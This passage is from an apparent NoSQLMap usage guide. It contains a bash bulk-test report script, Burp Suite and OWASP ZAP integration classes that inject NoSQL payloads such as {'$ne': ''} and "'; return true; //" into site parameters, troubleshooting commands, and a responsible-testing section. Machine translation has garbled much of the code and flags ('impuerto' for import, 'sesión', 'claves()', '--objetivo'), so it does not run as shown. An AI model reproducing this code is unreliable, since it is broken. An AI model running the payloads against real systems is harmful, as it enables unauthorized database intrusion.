echo " <tr class=\"$css_class\">" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
echo " <td>$objetivo</td>" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
echo " <td>$status</td>" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
echo " <td>$vulns</td>" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
echo " <td>$duration</td>" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
echo " </tr>" >> "$OUTPUT_DIR/bulk_test_repuerto.html"
done
cat >> "$OUTPUT_DIR/bulk_test_repuerto.html" << EOF
</table>
</body>
</html>
EOF
echo "Bulk testing completed!"
echo "Results saved in: $OUTPUT_DIR"
echo "Summary repuerto: $OUTPUT_DIR/bulk_test_repuerto.html"
# Print summary statistics
echo ""
echo "Summary Statistics:"
echo "==================="
total_objetivos=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|wc -l)
vulnerable_objetivos=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "VULNERABLE")
error_objetivos=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "ERROR")
tested_objetivos=$(tail -n +2 "$OUTPUT_DIR/summary.csv"|grep -c "TESTED")
echo "Total objetivos: $total_objetivos"
echo "Vulnerable objetivos: $vulnerable_objetivos"
echo "Error objetivos: $error_objetivos"
echo "Successfully tested: $tested_objetivos"
if [ "$total_objetivos" -gt 0 ]; then
vulnerabilidad_rate=$((vulnerable_objetivos * 100 / total_objetivos))
echo "vulnerabilidad rate: $vulnerabilidad_rate%"
fi
Integration ejemplos
Burp Suite Integration
#!/usr/bin/env python3
# NoSQLMap integration with Burp Suite
impuerto requests
impuerto json
impuerto base64
from urllib.parse impuerto urlparse, parse_qs
class BurpNoSQLIntegration:
def __init__(self, burp_proxy="http://127.0.0.1:8080"):
self.burp_proxy = burp_proxy
self.sesión = requests.sesión()
self.sesión.proxies = \\\\{"http": burp_proxy, "https": burp_proxy\\\\}
self.sesión.verify = False # Disable SSL verification for Burp
def impuerto_burp_request(self, burp_request_file):
"""Impuerto request from Burp Suite"""
with open(burp_request_file, 'r') as f:
request_data = f.read()
# Parse Burp request format
lines = request_data.split('\n')
# Extract method, URL, and headers
request_line = lines[0]
method, path, protocolo = request_line.split(' ')
headers = \\\\{\\\\}
body = ""
body_start = False
for line in lines[1:]:
if line.strip() == "":
body_start = True
continue
if body_start:
body += line + '\n'
else:
if ':' in line:
clave, value = line.split(':', 1)
headers[clave.strip()] = value.strip()
# Extract host from headers
host = headers.get('host', '')
# Construct full URL
scheme = "https" if "443" in host else "http"
url = f"\\\\{scheme\\\\}://\\\\{host\\\\}\\\\{path\\\\}"
return \\\\{
"method": method,
"url": url,
"headers": headers,
"body": body.strip()
\\\\}
def test_nosql_injection(self, request_data):
"""Test for Noinyección SQL in Burp request"""
results = []
# Test URL parámetros
parsed_url = urlparse(request_data["url"])
if parsed_url.query:
params = parse_qs(parsed_url.query)
for param_name, param_values in params.items():
for param_value in param_values:
result = self.test_parámetro(
request_data,
param_name,
param_value,
"url"
)
if result:
results.append(result)
# Test POST body parámetros
if request_data["method"] == "POST" and request_data["body"]:
content_type = request_data["headers"].get("Content-Type", "")
if "application/json" in content_type:
results.extend(self.test_json_body(request_data))
elif "application/x-www-form-urlencoded" in content_type:
results.extend(self.test_form_body(request_data))
return results
def test_parámetro(self, request_data, param_name, param_value, param_type):
"""Test individual parámetro for Noinyección SQL"""
# Noinyección SQL payloads
payloads = [
\\\\{"$ne": ""\\\\},
\\\\{"$gt": ""\\\\},
\\\\{"$regex": ".*"\\\\},
\\\\{"$exists": True\\\\},
"'; return true; //",
"\"; return true; //",
"true, true"
]
for payload in payloads:
# Modify request with payload
modified_request = self.inject_payload(
request_data,
param_name,
payload,
param_type
)
# Send request through Burp
try:
response = self.send_request(modified_request)
# Analyze response for injection indicators
if self.analyze_response(response, request_data):
return \\\\{
"parámetro": param_name,
"parámetro_type": param_type,
"payload": payload,
"vulnerable": True,
"response_length": len(response.text),
"status_code": response.status_code
\\\\}
except Exception as e:
print(f"Error testing parámetro \\\\{param_name\\\\}: \\\\{e\\\\}")
return None
def inject_payload(self, request_data, param_name, payload, param_type):
"""Inject payload into request parámetro"""
modified_request = request_data.copy()
if param_type == "url":
# Modify URL parámetro
parsed_url = urlparse(request_data["url"])
params = parse_qs(parsed_url.query)
if isinstance(payload, dict):
params[param_name] = [json.dumps(payload)]
else:
params[param_name] = [str(payload)]
# Reconstruct URL
new_query = "&".join([f"\\\\{k\\\\}=\\\\{v[0]\\\\}" for k, v in params.items()])
modified_request["url"] = f"\\\\{parsed_url.scheme\\\\}://\\\\{parsed_url.netloc\\\\}\\\\{parsed_url.path\\\\}?\\\\{new_query\\\\}"
elif param_type == "json":
# Modify JSON body
try:
body_data = json.loads(request_data["body"])
body_data[param_name] = payload
modified_request["body"] = json.dumps(body_data)
except:
pass
return modified_request
def send_request(self, request_data):
"""Send request through Burp proxy"""
if request_data["method"] == "GET":
response = self.sesión.get(
request_data["url"],
headers=request_data["headers"]
)
elif request_data["method"] == "POST":
response = self.sesión.post(
request_data["url"],
headers=request_data["headers"],
data=request_data["body"]
)
else:
response = self.sesión.request(
request_data["method"],
request_data["url"],
headers=request_data["headers"],
data=request_data["body"]
)
return response
def analyze_response(self, response, original_request):
"""Analyze response for injection indicators"""
# Check for error messages indicating injection
error_indicators = [
"MongoError",
"CouchDB",
"Redis",
"NoSQL",
"JSON.parse",
"sintaxisError",
"unexpected token"
]
response_text = response.text.lower()
for indicator in error_indicators:
if indicator.lower() in response_text:
return True
# Check for significant response length differences
# This would require baseline response for comparison
return False
# uso
if __name__ == "__main__":
integration = BurpNoSQLIntegration()
# Impuerto request from Burp
request_data = integration.impuerto_burp_request("burp_request.txt")
# Test for Noinyección SQL
results = integration.test_nosql_injection(request_data)
# Print results
for result in results:
if result["vulnerable"]:
print(f"Vulnerable parámetro found: \\\\{result['parámetro']\\\\}")
print(f"payload: \\\\{result['payload']\\\\}")
OWASP ZAP Integration
#!/usr/bin/env python3
# NoSQLMap integration with OWASP ZAP
from zapv2 impuerto ZAPv2
impuerto time
impuerto json
class ZAPNoSQLIntegration:
def __init__(self, zap_proxy="http://127.0.0.1:8080"):
self.zap = ZAPv2(proxies=\\\\{'http': zap_proxy, 'https': zap_proxy\\\\})
self.nosql_payloads = self.load_nosql_payloads()
def load_nosql_payloads(self):
"""Load Noinyección SQL payloads"""
return [
'\\\\{"$ne":""\\\\}',
'\\\\{"$gt":""\\\\}',
'\\\\{"$regex":".*"\\\\}',
'\\\\{"$exists":true\\\\}',
"'; return true; //",
'"; return true; //',
"true, true",
"false, true"
]
def spider_objetivo(self, objetivo_url):
"""Spider objetivo to discover endpoints"""
print(f"Spidering objetivo: \\\\{objetivo_url\\\\}")
# Start spider
spider_id = self.zap.spider.scan(objetivo_url)
# Wait for spider to complete
while int(self.zap.spider.status(spider_id)) < 100:
print(f"Spider progress: \\\\{self.zap.spider.status(spider_id)\\\\}%")
time.sleep(5)
print("Spider completed")
# Get discovered URLs
urls = self.zap.core.urls()
return urls
def test_nosql_injection(self, objetivo_url):
"""Test objetivo for Noinyección SQL vulnerabilities"""
# Spider objetivo first
urls = self.spider_objetivo(objetivo_url)
vulnerabilities = []
for url in urls:
print(f"Testing URL: \\\\{url\\\\}")
# Get URL parámetros
params = self.get_url_parámetros(url)
for param in params:
for payload in self.nosql_payloads:
# Test parámetro with payload
result = self.test_parámetro_injection(url, param, payload)
if result:
vulnerabilities.append(result)
return vulnerabilities
def get_url_parámetros(self, url):
"""Extract parámetros from URL"""
from urllib.parse impuerto urlparse, parse_qs
parsed = urlparse(url)
params = parse_qs(parsed.query)
return list(params.claves())
def test_parámetro_injection(self, url, parámetro, payload):
"""Test specific parámetro for injection"""
# Modify URL with payload
modified_url = self.inject_payload_in_url(url, parámetro, payload)
# Send request through ZAP
try:
response = self.zap.core.send_request(modified_url)
# Analyze response
if self.analyze_nosql_response(response):
return \\\\{
"url": url,
"parámetro": parámetro,
"payload": payload,
"vulnerable": True,
"response": response
\\\\}
except Exception as e:
print(f"Error testing \\\\{url\\\\} with payload \\\\{payload\\\\}: \\\\{e\\\\}")
return None
def inject_payload_in_url(self, url, parámetro, payload):
"""Inject payload into URL parámetro"""
from urllib.parse impuerto urlparse, parse_qs, urlencode, urlunparse
parsed = urlparse(url)
params = parse_qs(parsed.query)
# Inject payload
params[parámetro] = [payload]
# Reconstruct URL
new_query = urlencode(params, doseq=True)
new_parsed = parsed._replace(query=new_query)
return urlunparse(new_parsed)
def analyze_nosql_response(self, response):
"""Analyze response for Noinyección SQL indicators"""
# Check for error messages
error_indicators = [
"MongoError",
"CouchDB",
"Redis",
"NoSQL",
"JSON.parse",
"sintaxisError"
]
response_text = response.lower()
for indicator in error_indicators:
if indicator.lower() in response_text:
return True
return False
def generate_zap_repuerto(self, vulnerabilities, output_file="zap_nosql_repuerto.html"):
"""Generate ZAP-style repuerto for NoSQL vulnerabilities"""
# Add custom alerts to ZAP
for vuln in vulnerabilities:
self.zap.core.add_alert(
risk="High",
confidence="Medium",
name="Noinyección SQL",
Descripción=f"Noinyección SQL vulnerabilidad found in parámetro \\\\{vuln['parámetro']\\\\}",
url=vuln["url"],
param=vuln["parámetro"],
evidence=vuln["payload"]
)
# Generate HTML repuerto
repuerto = self.zap.core.htmlrepuerto()
with open(output_file, 'w') as f:
f.write(repuerto)
print(f"Repuerto generated: \\\\{output_file\\\\}")
# uso
if __name__ == "__main__":
zap_integration = ZAPNoSQLIntegration()
objetivo_url = "http://ejemplo.com"
# Test for Noinyección SQL
vulnerabilities = zap_integration.test_nosql_injection(objetivo_url)
# Generate repuerto
zap_integration.generate_zap_repuerto(vulnerabilities)
print(f"Found \\\\{len(vulnerabilities)\\\\} Noinyección SQL vulnerabilities")
solución de problemas
Common Issues
instalación Problems:
# Python dependency issues
pip install --upgrade pip
pip install --upgrade setuptools wheel
# Permission issues
pip install --user nosqlmap
# Virtual environment issues
python3 -m venv nosqlmap-env
source nosqlmap-env/bin/activate
pip install nosqlmap
# Missing system dependencies
sudo apt install python3-dev libffi-dev libssl-dev
conexión Issues:
# Proxy configuración
nosqlmap --objetivo http://ejemplo.com --proxy http://127.0.0.1:8080
# SSL/TLS issues
nosqlmap --objetivo https://ejemplo.com --disable-ssl-verification
# Timeout issues
nosqlmap --objetivo http://ejemplo.com --timeout 30
# User agent issues
nosqlmap --objetivo http://ejemplo.com --user-agent "Custom Agent"
Database-Specific Issues:
# MongoDB conexión issues
# Check MongoDB version compatibility
# Verify autenticación requirements
# Check network connectivity
# CouchDB access issues
# Verify CouchDB version
# Check autenticación settings
# Validate view permissions
# Redis conexión problems
# Check Redis configuración
# Verify autenticación
# Test network connectivity
Debugging
Enable detailed debugging and logging:
# Verbose output
nosqlmap --objetivo http://ejemplo.com --verbose
# Debug mode
nosqlmap --objetivo http://ejemplo.com --debug
# Save all requests/responses
nosqlmap --objetivo http://ejemplo.com --save-requests
# Custom logging
nosqlmap --objetivo http://ejemplo.com --log-file nosql_debug.log
# Network debugging
nosqlmap --objetivo http://ejemplo.com --proxy http://127.0.0.1:8080 --verbose
Security Considerations
Responsible Testing
autorización: - Only test systems you own or have explicit permission to test - Obtain proper written autorización before testing - Respect scope limitations and testing windows - Document all testing activities
Impacto Minimization: - Use read-only operations when possible - Avoid destructive payloads in production environments - Implement rate limiting to avoid DoS - Monitor system Impacto during testing
Legal and Compliance
Legal Requirements: - Comply with applicable laws and regulations - Respect terms of servicio and uso policies - Maintain confidentiality of discovered vulnerabilities - Follow responsible disclosure practices
Best Practices: - Use dedicated testing environments when possible - Implement proper Control de Accesos for testing tools - Secure storage of testing results and evidence - Regular security training and awareness